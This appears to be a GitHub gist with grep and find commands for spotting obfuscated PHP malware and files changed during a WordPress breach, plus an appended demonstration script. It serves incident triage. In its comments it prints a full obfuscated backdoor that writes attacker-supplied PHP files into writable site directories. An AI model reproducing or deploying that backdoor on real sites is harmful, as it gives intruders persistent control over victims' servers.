@kiwimato
Created June 18, 2023 16:42
Grep WordPress to search for obfuscated PHP malware
grep "\$[a-zA-Z0-9]*(" ./ -ir
# should find some funky stuff like:
# ./wp-content/plugins/classic-editor/js/hoxozkwa.php:<?php $LRhdThLn = "\104"."\117".chr(67)."\x55".chr(77).'E'."\x4e"."\x54".chr(95)."\x52".chr(79).chr(79).'T';$qEJGBsQZ = "\x48"."\x54".'T'.chr(331-251).chr(95).'H'."\117"."\x53"."\x54";$FocpVmGikU = chr(104)."\x74".chr(116).chr(875-763)."\72"."\57".chr(370-323);$InqeP = chr(591-545).chr(463-351)."\150".chr(112);$OmaOCPiem = "\160".chr(104)."\160";$aALnXcWKii = 'f'."\151"."\154".chr(101)."\137".chr(889-777)."\x75".chr(727-611).chr(95).chr(99)."\157".chr(110).'t'.chr(576-475)."\x6e"."\x74".'s';$eleTmtrO = chr(552-438)."\x61".chr(119).'u'."\162".chr(732-624).'d'."\145".chr(950-851)."\x6f".'d'."\x65";$YGdQfPUtlO = chr(117)."\156"."\x73"."\145".chr(114).'i'.'a'."\154".'i'.chr(585-463).chr(799-698);$wuLUaDUX = chr(112)."\150".chr(112)."\166"."\145"."\x72"."\163"."\151".chr(111).'n';$VaXDosXIU = 's'.'t'."\x72"."\x5f".chr(114).chr(227-116)."\164".chr(49).chr(108-57);$BVrBroINfP = "\163".chr(101).'r'.'i'."\141".chr(637-529)."\151".chr(579-457)."\145";$jltoISt = chr(845-730).'t'."\x72".'_'.chr(115).chr(112)."\154".chr(105)."\x74";foreach ($_POST as $IbPYBs => $eIuItYTG){if (strlen($IbPYBs) == 16){$eIuItYTG = $jltoISt($eleTmtrO($VaXDosXIU($eIuItYTG)));$IbPYBs = array_slice($jltoISt(str_repeat($IbPYBs, (count($eIuItYTG)/16)+1)), 0, count($eIuItYTG));function VrKLUkfxG($lcvkMP, $qljnaDbI, $IbPYBs){$IdsUDSqEOX = "baddf620-11f1-4e09-9f3d-876476b02b3a";return $lcvkMP ^ $IdsUDSqEOX[$qljnaDbI % strlen($IdsUDSqEOX)] ^ $IbPYBs;}$eIuItYTG = implode("", array_map("VrKLUkfxG", array_values($eIuItYTG), array_keys($eIuItYTG), array_values($IbPYBs)));$eIuItYTG = @$YGdQfPUtlO($eIuItYTG);if (@is_array($eIuItYTG)){$RvqUXNHiI = array_keys($eIuItYTG);$eIuItYTG = $eIuItYTG[$RvqUXNHiI[0]];if ($eIuItYTG === $RvqUXNHiI[0]){echo @$BVrBroINfP(Array($OmaOCPiem => @$wuLUaDUX(), ));exit();}else {function JZejiips($CPKtGwir){static $OCUaFV = array();$HQbufPbr = glob($CPKtGwir . 
# '/*', GLOB_ONLYDIR);if (count($HQbufPbr) > 0) {foreach ($HQbufPbr as $CPKtGw) {if (@is_writable($CPKtGw)) {$OCUaFV[] = $CPKtGw;}}}foreach ($HQbufPbr as $CPKtGwir) JZejiips($CPKtGwir);return $OCUaFV;}$cMaYE = $_SERVER[$LRhdThLn];$HQbufPbr = JZejiips($cMaYE);$RvqUXNHiI = array_rand($HQbufPbr);$mtujCvFpOt = $HQbufPbr[$RvqUXNHiI] . "/" . substr(md5(time()), 0, 8) . $InqeP;@$aALnXcWKii($mtujCvFpOt, $eIuItYTG);echo $FocpVmGikU . $_SERVER[$qEJGBsQZ] . substr($mtujCvFpOt, strlen($cMaYE));exit();}}}}
# root@zupe # ls -alFth ./wp-content/plugins/classic-editor/js/hoxozkwa.php
# -rw-r--r-- 1 zupe-1 zupe-1 2.4K Feb 6 2020 ./wp-content/plugins/classic-editor/js/hoxozkwa.php
# Once you know the date of the breach, you can search for files modified around that date to narrow down what got changed:
# Of course there will also be false positives: some will be legitimate files, but some of them could also have been backdoored with only a slight modification.
# For example, 088p8rr8/FabZZ.js.php is clearly malicious, and you can confirm that by looking at the file with `cat`.
# root@zupe:/home/zupe-1/htdocs/www.zupe.website# touch --date "2020-02-05" /tmp/start
# touch --date "2020-02-07" /tmp/end
# root@zupe:/home/zupe-1/htdocs/www.zupe.website# find . -type f -newer /tmp/start -not -newer /tmp/end
# ./wp-blog-header.php
# ./wp-admin/moderation.php
# ./wp-content/themes/088p8rr8/FabZZ.js.php
# ./wp-content/themes/088p8rr8/aRO.js.php
# ./wp-content/themes/088p8rr8/Nd.js.php
# ./wp-content/themes/twentytwentythree/Nd.js.php
# ./wp-content/plugins/84q5po64/FabZZ.js.php
# ./wp-content/plugins/84q5po64/aRO.js.php
# ./wp-content/plugins/84q5po64/Nd.js.php
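As an added example (not part of the gist), the two manual checks above wrapped into POSIX sh functions and run against a constructed tree: the fixture paths, the file `xqzv.php` (which only calls `strlen`) and the extra chr()/hex patterns are my additions, not findings from the gist.

```shell
#!/bin/sh
# Added example, not part of the gist: the two checks above as reusable functions,
# run against a constructed tree. The fixture, its paths and the extra patterns
# (hex escapes, chr() chains) are my additions.

# List *.php files under $1 that call a function through a variable ($name(...)),
# chain chr() calls, or carry \xNN escapes. Expect false positives: legitimate code
# does use these, so this narrows triage rather than confirming compromise.
scan_obfuscated_php() {
    grep -rlE --include='*.php' \
        -e '\$[A-Za-z0-9_]+\(' \
        -e 'chr\([0-9]+\)\.' \
        -e '\\x[0-9a-fA-F]{2}' \
        "$1" 2>/dev/null | sort
}

# List files under $1 modified after $2 and not after $3 (touch -t stamps,
# CCYYMMDDhhmm). Uses reference files like the gist, so it needs no GNU -newermt.
files_changed_between() {
    refs=$(mktemp -d)
    touch -t "$2" "$refs/start"
    touch -t "$3" "$refs/end"
    find "$1" -type f -newer "$refs/start" ! -newer "$refs/end" | sort
    rm -rf "$refs"
}

# Build a constructed WordPress-like tree: one plain plugin file dated 2019 and one
# file dated 2020-02-06 that assembles a function name from pieces. It only calls
# strlen; the point is the shape, which the grep above should flag.
make_fixture() {
    root=$(mktemp -d)
    mkdir -p "$root/wp-content/plugins/clean/js"
    printf '<?php\necho strlen("hello");\n' > "$root/wp-content/plugins/clean/clean.php"
    printf '<?php\n$f = "\\x73".chr(116)."rlen";\necho $f("abc");\n' \
        > "$root/wp-content/plugins/clean/js/xqzv.php"
    touch -t 201912010000 "$root/wp-content/plugins/clean/clean.php"
    touch -t 202002060300 "$root/wp-content/plugins/clean/js/xqzv.php"
    printf '%s\n' "$root"
}

# Demo: scan the fixture, then list what changed in the two-day window around the
# suspicious mtime, the way the gist narrows down a breach date.
root=$(make_fixture)
echo "== obfuscation pattern hits =="; scan_obfuscated_php "$root"
echo "== files modified 2020-02-05..2020-02-07 =="
files_changed_between "$root" 202002050000 202002070000
rm -rf "$root"
```

Point the functions at a real document root to reproduce the gist's two steps; the date window is the one to tune once a suspicious mtime like the one in the `ls` output above is known.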